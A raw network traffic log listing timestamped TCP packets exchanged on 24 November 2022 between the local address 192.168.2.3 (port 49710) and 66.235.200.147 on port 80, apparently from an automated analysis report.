Nov 24, 2022 12:20:03.352982998 CET	49710	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:20:03.353049994 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.353090048 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.353108883 CET	49710	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:20:03.353131056 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.353143930 CET	49710	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:20:03.353169918 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.353183985 CET	49710	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:20:03.353209972 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.353224039 CET	49710	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:20:03.353250027 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.353265047 CET	49710	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:20:03.353291035 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.353328943 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.353343010 CET	49710	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:20:03.353368998 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.353409052 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.353421926 CET	49710	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:20:03.353450060 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.353461981 CET	49710	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:20:03.353491068 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.353530884 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.353547096 CET	49710	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:20:03.353571892 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.353614092 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.353626013 CET	49710	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:20:03.353653908 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.353667021 CET	49710	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:20:03.353694916 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.353735924 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.353744984 CET	49710	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:20:03.353775024 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.353815079 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.353827953 CET	49710	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:20:03.353853941 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.353863955 CET	49710	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:20:03.353893995 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.353930950 CET	49710	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:20:03.353936911 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.353960991 CET	49710	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:20:03.353976011 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.353992939 CET	49710	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:20:03.354016066 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.354032993 CET	49710	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:20:03.354068995 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.354083061 CET	49710	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:20:03.354109049 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.354125977 CET	49710	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:20:03.354150057 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.354161024 CET	49710	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:20:03.354191065 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.354206085 CET	49710	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:20:03.354231119 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.354245901 CET	49710	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:20:03.354271889 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.354283094 CET	49710	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:20:03.354312897 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.354353905 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.354382992 CET	49710	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:20:03.354393959 CET	49710	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:20:03.354396105 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.354420900 CET	49710	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:20:03.354434967 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.354449987 CET	49710	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:20:03.354469061 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.354475975 CET	49710	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:20:03.354511023 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.354516029 CET	49710	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:20:03.354552984 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.354593039 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.354607105 CET	49710	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:20:03.354634047 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.354649067 CET	49710	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:20:03.354675055 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.354682922 CET	49710	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:20:03.354717016 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.354758024 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.354770899 CET	49710	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:20:03.354796886 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.354799986 CET	49710	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:20:03.354836941 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.354840994 CET	49710	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:20:03.354876041 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.354888916 CET	49710	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:20:03.354940891 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.354984999 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.355000973 CET	49710	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:20:03.355021954 CET	49710	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:20:03.355027914 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.355037928 CET	49710	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:20:03.355067968 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.355072975 CET	49710	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:20:03.355108023 CET	49710	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:20:03.355109930 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.355149984 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.355151892 CET	49710	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:20:03.355190039 CET	49710	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:20:03.355190039 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.355231047 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.355232954 CET	49710	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:20:03.355269909 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.355269909 CET	49710	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:20:03.355309963 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.355350018 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.355359077 CET	49710	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:20:03.355391026 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.355391979 CET	49710	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:20:03.355432987 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.355453014 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.355472088 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.355479002 CET	49710	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:20:03.355490923 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.355504036 CET	49710	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:20:03.355506897 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.355525970 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.355535030 CET	49710	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:20:03.355544090 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.355561972 CET	49710	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:20:03.355562925 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.355571985 CET	49710	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:20:03.355581999 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.355591059 CET	49710	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:20:03.355600119 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.355617046 CET	49710	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:20:03.355621099 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.355640888 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.355644941 CET	49710	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:20:03.355659008 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.355668068 CET	49710	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:20:03.355675936 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.355688095 CET	49710	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:20:03.355695009 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.355707884 CET	49710	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:20:03.355712891 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.355724096 CET	49710	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:20:03.355731964 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.355741024 CET	49710	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:20:03.355750084 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.355760098 CET	49710	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:20:03.355768919 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.355777025 CET	49710	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:20:03.355787039 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.355798006 CET	49710	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:20:03.355804920 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.355811119 CET	49710	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:20:03.355823040 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.355829954 CET	49710	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:20:03.355840921 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.355846882 CET	49710	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:20:03.355859041 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.355864048 CET	49710	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:20:03.355878115 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.355891943 CET	49710	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:20:03.355896950 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.355900049 CET	49710	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:20:03.355914116 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.355916977 CET	49710	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:20:03.355932951 CET	49710	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:20:03.355933905 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.355952978 CET	49710	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:20:03.355953932 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.355973005 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.355973959 CET	49710	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:20:03.355992079 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.355992079 CET	49710	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:20:03.356010914 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.356013060 CET	49710	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:20:03.356029034 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.356031895 CET	49710	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:20:03.356046915 CET	49710	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:20:03.356046915 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.356065989 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.356067896 CET	49710	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:20:03.356085062 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.356086016 CET	49710	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:20:03.356102943 CET	49710	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:20:03.356102943 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.356121063 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.356123924 CET	49710	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:20:03.356138945 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.356142044 CET	49710	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:20:03.356157064 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.356161118 CET	49710	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:20:03.356175900 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.356177092 CET	49710	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:20:03.356194019 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.356197119 CET	49710	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:20:03.356211901 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.356215000 CET	49710	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:20:03.356230974 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.356234074 CET	49710	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:20:03.356250048 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.356251001 CET	49710	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:20:03.356267929 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.356270075 CET	49710	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:20:03.356283903 CET	49710	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:20:03.356286049 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.356304884 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.356308937 CET	49710	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:20:03.356323957 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.356328011 CET	49710	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:20:03.356342077 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.356345892 CET	49710	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:20:03.356359959 CET	49710	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:20:03.356360912 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.356379986 CET	49710	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:20:03.356379986 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.356401920 CET	49710	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:20:03.356417894 CET	49710	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:20:03.366023064 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.366070986 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.366091013 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.366133928 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.366154909 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.366173029 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.366192102 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.366209984 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.366215944 CET	49710	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:20:03.366228104 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.366247892 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.366261959 CET	49710	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:20:03.366266012 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.366285086 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.366288900 CET	49710	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:20:03.366302967 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.366311073 CET	49710	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:20:03.366321087 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.366334915 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.366338015 CET	49710	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:20:03.366353035 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.366360903 CET	49710	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:20:03.366370916 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.366374016 CET	49710	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:20:03.366389036 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.366408110 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.366419077 CET	49710	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:20:03.366427898 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.366430044 CET	49710	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:20:03.366446972 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.366453886 CET	49710	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:20:03.366466999 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.366481066 CET	49710	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:20:03.366483927 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.366503000 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.366519928 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.366522074 CET	49710	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:20:03.366522074 CET	49710	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:20:03.366532087 CET	49710	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:20:03.366535902 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.366549015 CET	49710	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:20:03.366554022 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.366569042 CET	49710	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:20:03.366571903 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.366589069 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.366609097 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.366621971 CET	49710	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:20:03.366621971 CET	49710	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:20:03.366621971 CET	49710	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:20:03.366630077 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.366635084 CET	49710	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:20:03.366648912 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.366652012 CET	49710	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:20:03.366668940 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.366671085 CET	49710	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:20:03.366688013 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.366691113 CET	49710	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:20:03.366704941 CET	49710	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:20:03.366707087 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.366724968 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.366725922 CET	49710	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:20:03.366743088 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.366748095 CET	49710	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:20:03.366763115 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.366781950 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.366784096 CET	49710	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:20:03.366784096 CET	49710	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:20:03.366799116 CET	49710	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:20:03.366801023 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.366821051 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.366838932 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.366847038 CET	49710	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:20:03.366847038 CET	49710	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:20:03.366858006 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.366864920 CET	49710	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:20:03.366888046 CET	49710	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:20:03.366890907 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.366904974 CET	49710	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:20:03.366914988 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.366934061 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.366950035 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.366966963 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.366981983 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.366995096 CET	49710	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:20:03.366998911 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.367018938 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.367027044 CET	49710	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:20:03.367033005 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.367047071 CET	49710	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:20:03.367049932 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.367068052 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.367073059 CET	49710	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:20:03.367084980 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.367089987 CET	49710	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:20:03.367103100 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.367110014 CET	49710	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:20:03.367120028 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.367125034 CET	49710	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:20:03.367137909 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.367156029 CET	49710	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:20:03.367156982 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.367176056 CET	49710	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:20:03.367177010 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.367201090 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.367227077 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.367232084 CET	49710	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:20:03.367249966 CET	49710	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:20:03.367253065 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.367275953 CET	49710	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:20:03.367278099 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.367300987 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.367314100 CET	49710	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:20:03.367322922 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.367325068 CET	49710	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:20:03.367341995 CET	49710	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:20:03.367346048 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.367362976 CET	49710	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:20:03.367372036 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.367383003 CET	49710	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:20:03.367400885 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.367420912 CET	49710	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:20:03.367425919 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.367450953 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.367461920 CET	49710	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:20:03.367475986 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.367477894 CET	49710	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:20:03.367494106 CET	49710	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:20:03.367499113 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.367515087 CET	49710	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:20:03.367522955 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.367537022 CET	49710	80	192.168.2.3	66.235.200.147
